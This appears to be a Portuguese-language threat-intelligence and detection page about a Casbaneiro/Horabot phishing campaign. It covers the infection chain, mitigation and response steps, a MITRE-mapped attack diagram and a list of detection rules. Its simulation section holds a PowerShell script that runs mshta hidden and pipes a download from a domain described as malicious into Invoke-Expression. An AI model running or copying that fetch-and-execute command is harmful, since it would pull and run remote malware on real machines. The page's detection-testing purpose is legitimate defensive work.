Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Investigação
Pesquisadores reconstruíram a cadeia ponta a ponta, desde o anexo inicial até a execução da carga final. Eles analisaram um estágio HTA que aciona o mshta.exe, seguido por um carregador JavaScript/VBScript em dois passos e componentes AutoIT usados para descriptografar contêineres criptografados com AES com um valor de semente codificado. A análise estática confirmou a presença dos binários Horbot e Casbaneiro, juntamente com lógica anti-análise que verifica nomes de usuários de sandbox e artefatos relacionados a máquinas virtuais. Observações de rede mostraram infraestrutura de C2 protegida por domínios Cloudflare e uma API PHP usada para gerar PDFs dinâmicos, por vítima, durante a fase de entrega.
Mitigação
Bloqueie ou controle rigidamente a execução do mshta.exe para conteúdo não confiável e fortaleça a inspeção de anexos para cadeias baseadas em ZIP/HTA/script. Monitore comportamentos anormais do PowerShell que interagem com objetos COM do Outlook, o que pode indicar propagação direcionada a caixas de correio. No nível da rede, bloqueie ou alerte sobre os domínios e o endereço IP malignos identificados, e aplique filtragem de URL para restringir o acesso a serviços de geração de PDFs usados para faseamento. Use listas de aplicativos permitidos para impedir que intérpretes AutoIT sejam executados sem aprovação explícita.
Resposta
Quando a atividade é detectada, isole o endpoint, pare processos suspeitos do mshta.exe e PowerShell, e remova novos artefatos criados, especialmente arquivos baixados para diretórios Públicos. Colete os estágios HTA, VBS e AutoIT para revisão forense e, em seguida, procure por staticdata.dll e at.dll nos hosts afetados. Redefina credenciais de contas de e-mail comprometidas, desabilite automação maliciosa ou regras do COM do Outlook e atualize o conteúdo de detecção com IOCs extraídos enquanto monitora o movimento lateral e phishing subsequente de caixas de entrada sequestradas.
Palavras-chave: Augmented Marauder, Water Saci, Casbaneiro, Horbot, América Latina, phishing em espanhol, isca de WhatsApp, ClickFix, HTA, mshta.exe, VBScript, carregador JavaScript, AutoIT, PowerShell, COM do Outlook, descriptografia AES, UUID ZIP, PDF protegido por senha, C2 Cloudflare, API PHP, trojan bancário, sequestro de conta de e-mail.
"graph TB %% Definições de Classes classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#e6e6e6 classDef process fill:#ffdd99 classDef malware fill:#ff9999 classDef persistence fill:#ccffcc classDef c2 fill:#ffcc99 classDef operator fill:#ff9900 %% Definições de Nós action_phish_attach["<b>Ação</b> – <b>T1566.001 Phishing: Anexo Spearphishing</b><br/>E-mail malicioso com PDF protegido por senha disfarçado de intimação judicial"] class action_phish_attach action action_phish_link["<b>Ação</b> – <b>T1566.002 Phishing: Link Spearphishing</b><br/>Link em PDF aciona o download automático de um arquivo ZIP com nome UUID aleatório"] class action_phish_link action file_zip["<b>Arquivo</b> – Arquivo ZIP<br/>Contém arquivo HTA"] class file_zip file file_hta["<b>Arquivo</b> – Arquivo HTA<br/>Executado via mshta.exe"] class file_hta file process_mshta["<b>Processo</b> – mshta.exe<br/>Carrega JavaScript que busca VBScript de segunda etapa"] class process_mshta process script_vb["<b>Ação</b> – <b>T1059.005 Interprete de Comando e Script: Visual Basic</b><br/>Verificações de sandbox e download de carga"] class script_vb malware action_sandbox_evasion["<b>Ação</b> – <b>T1497.002 Evasão de Virtualização/Sandbox</b><br/>Verificações de atividades de usuário para nomes de usuários de sandbox e artefatos de VM"] class action_sandbox_evasion action action_deobfuscation["<b>Ação</b> – <b>T1140 Desofuscar/Decodificar Arquivos ou Informações</b><br/>Desofuscação de strings e códigos em tempo de execução"] class action_deobfuscation action script_powershell["<b>Ação</b> – <b>T1059.001 Interprete de Comando e Script: PowerShell</b><br/>Faz download de intérprete AutoIT e coleta contatos do Outlook"] class script_powershell malware tool_outlook["<b>Ferramenta</b> – Objetos COM do Outlook<br/>Extrai livro de endereços para propagação de e-mail"] class tool_outlook tool tool_autoit["<b>Ferramenta</b> – AutoIT<br/>Scripts compilados produzem cargas criptografadas"] class tool_autoit tool action_compile["<b>Ação</b> – <b>T1027.004 Arquivos ou Informações Ofuscados: Compilar Após Entrega</b><br/>Cargas compiladas no host antes da execução"] class action_compile action malware_dll["<b>Malware</b> – DLLs Criptografadas (staticdata.dll, at.dll)"] class malware_dll malware process_reflect_load["<b>Processo</b> – Carregamento de DLL Reflexiva<br/>Carrega DLLs diretamente na memória sem gravar no disco"] class process_reflect_load process action_injection["<b>Ação</b> – <b>T1055.001 Injeção de Processo: Injeção de DLL</b><br/>DLLs carregadas reflexivamente injetadas em processos"] class action_injection action persistence_shortcut["<b>Persistência</b> – <b>T1547.009 Modificação de Atalho</b><br/>LNK colocado na pasta de Inicialização"] class persistence_shortcut persistence c2_communication["<b>C2</b> – <b>T1102 Serviço Web</b><br/>HTTP GET/POST via domínios protegidos pelo Cloudflare"] class c2_communication c2 tool_turo["<b>Ferramenta</b> – Turo.exe (compilado AutoIT)"] class tool_turo tool tool_tekojac["<b>Ferramenta</b> – Tekojac.exe (Auto2Exe)"] class tool_tekojac tool action_masquerade["<b>Ação</b> – <b>T1036.008 Mascaramento</b><br/>Arquivos PDF e ZIP parecem legítimos"] class action_masquerade action %% Conexões action_phish_attach –>|entrega| file_zip file_zip –>|contém| file_hta file_hta –>|executado por| process_mshta process_mshta –>|carrega| script_vb script_vb –>|executa| action_sandbox_evasion action_sandbox_evasion –>|leva a| action_deobfuscation action_deobfuscation –>|revela| script_powershell script_powershell –>|usa| tool_outlook script_powershell –>|faz download de| tool_autoit tool_autoit –>|produz| action_compile action_compile –>|gera| malware_dll malware_dll –>|carregado por| process_reflect_load process_reflect_load –>|ativa| action_injection action_injection –>|injeta em| process_mshta action_injection –>|ativa| persistence_shortcut persistence_shortcut –>|mantém| c2_communication script_powershell –>|faz download de| tool_turo script_powershell –>|faz download de| tool_tekojac action_masquerade –>|encobre| action_phish_attach action_masquerade –>|encobre| action_phish_link %% Estilização class action_phish_attach action class action_phish_link action class file_zip file class file_hta file class process_mshta process class script_vb malware class action_sandbox_evasion action class action_deobfuscation action class script_powershell malware class tool_outlook tool class tool_autoit tool class action_compile action class malware_dll malware class process_reflect_load process class action_injection action class persistence_shortcut persistence class c2_communication c2 class tool_turo tool class tool_tekojac tool class action_masquerade action "
Fluxo de Ataque
Detecções
Arquivos Suspeitos no Perfil de Usuário Público (via file_event)
Visualizar
Strings Suspeitas do PowerShell (via powershell)
Visualizar
Execução Suspeita do Perfil de Usuário Público (via process_creation)
Visualizar
Chame Métodos Suspeitos .NET do PowerShell (via powershell)
Visualizar
LOLBAS WScript / CScript (via process_creation)
Visualizar
Execução Suspeita do Mshta Sem Arquivo HTA (via cmdline)
Visualizar
IOCs (HashSha256) para detectar: Descompactando as Campanhas Multi-Facetadas de Casbaneiro do Marauder Aumentado
Visualizar
IOCs (SourceIP) para detectar: Descompactando as Campanhas Multi-Facetadas de Casbaneiro do Marauder Aumentado
Visualizar
IOCs (DestinationIP) para detectar: Descompactando as Campanhas Multi-Facetadas de Casbaneiro do Marauder Aumentado
Visualizar
Detecção de Uso Malicioso de PowerShell e MAPI para Campanhas de Phishing [Windows Powershell]
Visualizar
Detecção de Campanha Casbaneiro Marauder Aumentado [Conexão de Rede do Windows]
Visualizar
Detecção de Execução de Mshta e PowerShell na Campanha Horabot [Criação de Processo do Windows]
Visualizar
Execução de Simulação
Pré-requisito: o Verificação de Telemetria e Base de Referência deve ter sido aprovados.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errados.
-
Narrativa de Ataque e Comandos:
O ator de ameaça visa estabelecer uma base de operações em uma estação de trabalho da vítima explorando Mshta para baixar e executar uma carga HTA maliciosa hospedada emhttps://ge.factu.it.com/GZSPEGIJ/YFSBNPQK. Imediatamente após, o ator usa PowerShell para baixar um script de segunda etapa do mesmo domínio viaInvoke‑WebRequeste executá-lo na memória. Ambos os binários são lançados a partir de um prompt de comando elevado para aumentar a probabilidade de registro de auditoria. -
Script de Teste de Regressão:
# Simulação do Horabot – aciona mshta e PowerShell na mesma sessão # 1. Inicie Mshta com URL malicioso $htaUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK" Start-Process -FilePath "$env:SystemRootsystem32mshta.exe" -ArgumentList $htaUrl -WindowStyle Hidden # 2. Inicie PowerShell para baixar e executar um script remoto $psUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK/payload.ps1" Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" ` -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Invoke-WebRequest -Uri '$psUrl' -UseBasicParsing | Invoke-Expression`"" ` -WindowStyle Hidden -
Comandos de Limpeza:
# Termine quaisquer processos maliciosos remanescentes (se sobreviveram) Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Stop-Process -Force # Remova quaisquer arquivos que possam ter sido baixados (locais de exemplo) $paths = @( "$env:TEMPpayload.ps1", "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.hta" ) foreach ($p in $paths) { if (Test-Path $p) { Remove-Item -Path $p -Force } }